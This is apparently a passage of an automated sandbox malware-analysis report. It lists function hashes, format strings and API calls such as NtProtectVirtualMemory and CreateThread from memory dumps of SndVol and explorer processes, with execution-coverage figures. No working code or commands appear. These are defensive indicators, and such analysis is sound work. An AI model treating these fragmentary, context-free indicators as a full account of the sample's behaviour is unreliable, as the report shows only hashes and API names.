• Opcode ID: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
• Instruction ID: e5e1bad6719912fdb7070c9e49ef76fcb0369dec250f04b702283b3ff3bd2a0b
• Opcode Fuzzy Hash: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
• Instruction Fuzzy Hash: BA0227B5508341AFD304CF1AE890A6BBBE5EFC4788F508A2DF9858B254DB31E915CB53
APIs
Strings
Similarity
• API ID: __aulldvrm
• String ID: +$-$0$0
• API String ID: 1302938615-699404926
• Opcode ID: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
• Instruction ID: b890a1b4789bce2873394ba6c081de92e1fa7a2a423603ff99f7e56f829e8b51
• Opcode Fuzzy Hash: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
• Instruction Fuzzy Hash: B281BEF8E0525A9FEF04CE6DC8917EEBBB3AF45394F644669D860A72D0CB349840CB51
APIs
Strings
Similarity
• API ID: ___swprintf_l
• String ID: %%%u$[$]:%u
• API String ID: 48624451-2819853543
• Opcode ID: c8a1dc455d0758d15c26aa2c73b4591983bd5adeb03c7db6f751fb935c2b9431
• Instruction ID: bee8a87b27cae52fcf03d9832f59f6e4de423a832f9ef81da372f70e7a2b120d
• Opcode Fuzzy Hash: c8a1dc455d0758d15c26aa2c73b4591983bd5adeb03c7db6f751fb935c2b9431
• Instruction Fuzzy Hash: 822186B6E00119ABDB11DF79CC409EE77FCAF54280F540125EA05E3240E731DA11CBA6
                                                                                                                                                  Strings
                                                                                                                                                  • RTL: Resource at %p, xrefs: 36607B8E
                                                                                                                                                  • RTL: Re-Waiting, xrefs: 36607BAC
                                                                                                                                                  • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 36607B7F
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                                  • API String ID: 0-871070163
                                                                                                                                                  • Opcode ID: 84b52187792f64f189298b2d85e5a3555c5a8687b2459b6f4bc5221bce90ce22
                                                                                                                                                  • Instruction ID: a0139ece154ae995e9e1de3b8d3b72f14df4c61e17bfafc14d41396b5dafc851
                                                                                                                                                  • Opcode Fuzzy Hash: 84b52187792f64f189298b2d85e5a3555c5a8687b2459b6f4bc5221bce90ce22
                                                                                                                                                  • Instruction Fuzzy Hash: F341BC39A447029FE714CE65CC40B5ABBE5EF88761F100A3DE95A9B780DB31E905CF92
                                                                                                                                                  APIs
                                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 3660728C
                                                                                                                                                  Strings
                                                                                                                                                  • RTL: Resource at %p, xrefs: 366072A3
                                                                                                                                                  • RTL: Re-Waiting, xrefs: 366072C1
                                                                                                                                                  • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 36607294
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                  • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                                  • API String ID: 885266447-605551621
                                                                                                                                                  • Opcode ID: f77ba6d1aeb2282bb9a45b68468d6dcdf6c9c9e03a468767df99fc68ca47d940
                                                                                                                                                  • Instruction ID: e31cd53d6899e0de923d2e725e0e0fd998275d0698b5f9f2ed7f5831afc0a40d
                                                                                                                                                  • Opcode Fuzzy Hash: f77ba6d1aeb2282bb9a45b68468d6dcdf6c9c9e03a468767df99fc68ca47d940
                                                                                                                                                  • Instruction Fuzzy Hash: A8410375A48356AFE714CE65CC80F56BBA5FF84794F100A39F8949B280DB31E816CBD2
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ___swprintf_l
                                                                                                                                                  • String ID: %%%u$]:%u
                                                                                                                                                  • API String ID: 48624451-3050659472
                                                                                                                                                  • Opcode ID: a8d4a0c0156b5d696d416eab50304fec8c6d331db5bd09eeff931dde87b2567b
                                                                                                                                                  • Instruction ID: 7e279beee18c42412673001c088b92c4bf737de2fa35fe0749ae09c0b36848de
                                                                                                                                                  • Opcode Fuzzy Hash: a8d4a0c0156b5d696d416eab50304fec8c6d331db5bd09eeff931dde87b2567b
                                                                                                                                                  • Instruction Fuzzy Hash: 91318476A006199FDB12DF29CC40BEE77BCEB44690F9005A6E849E3240EB309E54CFA5
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: __aulldvrm
                                                                                                                                                  • String ID: +$-
                                                                                                                                                  • API String ID: 1302938615-2137968064
                                                                                                                                                  • Opcode ID: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                                                                                  • Instruction ID: 0f3f5505df659c0ce6c6ab14f75acf0b5169af8efc68592be0048e5b1da3ce30
                                                                                                                                                  • Opcode Fuzzy Hash: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                                                                                  • Instruction Fuzzy Hash: 6191B474E002179FEB20DE6EC8856EEB7A5EF443A5FA0453AE864E72D0DB309941CB51
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: $$@
                                                                                                                                                  • API String ID: 0-1194432280
                                                                                                                                                  • Opcode ID: c1eb4d8969ce78afd616d708e3240af5da5eba5f80c0422c4d27196f49b24c0d
                                                                                                                                                  • Instruction ID: 955d90ccd1894143123c33fcbbdc9e88f94347c7e5131f070d1b200d0096ffbc
                                                                                                                                                  • Opcode Fuzzy Hash: c1eb4d8969ce78afd616d708e3240af5da5eba5f80c0422c4d27196f49b24c0d
                                                                                                                                                  • Instruction Fuzzy Hash: D8813BB5D10269DBDB21CF94CC44BDEB7B8AF48750F4041EAA909B7280D7319E84CFA5

Execution Graph

Execution Coverage: 1.5%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 0%
Total number of Nodes: 419
Total number of Limit Nodes: 14

Control-flow Graph (function e576232; legend: Executed / Not Executed; edge list omitted)

APIs
Strings
Memory Dump Source
• Source File: 00000006.00000002.4181797862.000000000E520000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E520000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_e520000_explorer.jbxd
Similarity
• API ID: CreateFile
• String ID: `
• API String ID: 823142352-2679148245
• Opcode ID: de128a41b66c8ec8222e6cdebfc92e8119e2b93de7d93fbb6a18759800a4d987
• Instruction ID: 535ef9a8030c72388cad70893578240b6cbcd1054762666bb5505635cc558cc3
• Opcode Fuzzy Hash: de128a41b66c8ec8222e6cdebfc92e8119e2b93de7d93fbb6a18759800a4d987
• Instruction Fuzzy Hash: 6B222F70A18E099FCB59DF28D4956BAF7F1FB98301F404A2ED49ED7250DB70A851CB82

Control-flow Graph (function e577e12; legend: Executed / Not Executed; edge list omitted)

APIs
• NtProtectVirtualMemory.NTDLL ref: 0E577E67
Memory Dump Source
• Source File: 00000006.00000002.4181797862.000000000E520000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E520000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_e520000_explorer.jbxd
Similarity
• API ID: MemoryProtectVirtual
• String ID:
• API String ID: 2706961497-0
• Opcode ID: 8fde5b3aa229c20c01e10f6c0a0911328a1d50ad6ca7dd15efa95d0be41baddf
• Instruction ID: d66a725451db823e7332952667f184b12cefc7bef0d330cc9e2e8827a7ff6fb4
• Opcode Fuzzy Hash: 8fde5b3aa229c20c01e10f6c0a0911328a1d50ad6ca7dd15efa95d0be41baddf
• Instruction Fuzzy Hash: 48019230628B484F8784EF6CA480126B7E4FBCD215F000B3EA99AC3250D760C9414742

Control-flow Graph (function e577e0a; legend: Executed / Not Executed; edge list omitted)

APIs
• NtProtectVirtualMemory.NTDLL ref: 0E577E67
Memory Dump Source
• Source File: 00000006.00000002.4181797862.000000000E520000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E520000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_e520000_explorer.jbxd
Similarity
• API ID: MemoryProtectVirtual
• String ID:
• API String ID: 2706961497-0
• Opcode ID: d782dca5996f3574fd0c4455d89641a9bf745bba617b6185d934ac73d2235392
• Instruction ID: a4067ed67b6ad7ecfeb5de7c9585a6cb811c82052bcf8bac6681283551344274
• Opcode Fuzzy Hash: d782dca5996f3574fd0c4455d89641a9bf745bba617b6185d934ac73d2235392
• Instruction Fuzzy Hash: 6A01A734628B884F8744EB3C94412A6B7E5FBCE314F000B7EE9DAC3240DB61D9014782

Control-flow Graph (function e56b412; legend: Executed / Not Executed; edge list omitted)

APIs
Memory Dump Source
• Source File: 00000006.00000002.4181797862.000000000E520000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E520000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_e520000_explorer.jbxd
Similarity
• API ID: CreateThread
• String ID:
• API String ID: 2422867632-0
• Opcode ID: 86dfbf082f461ee8d50c48ad175151c38d579804c722c71aa6313b9ca1572f48
• Instruction ID: 72a71961bf9d9d28d8026c6ef3e1018e4ccf7e24f37feb9a63a5843dcf4a0e54
• Opcode Fuzzy Hash: 86dfbf082f461ee8d50c48ad175151c38d579804c722c71aa6313b9ca1572f48
• Instruction Fuzzy Hash: 97F0F630268E494FD788EF2CD44563AF3D0FBE8215F440A3EE68DC7264DA79C9828716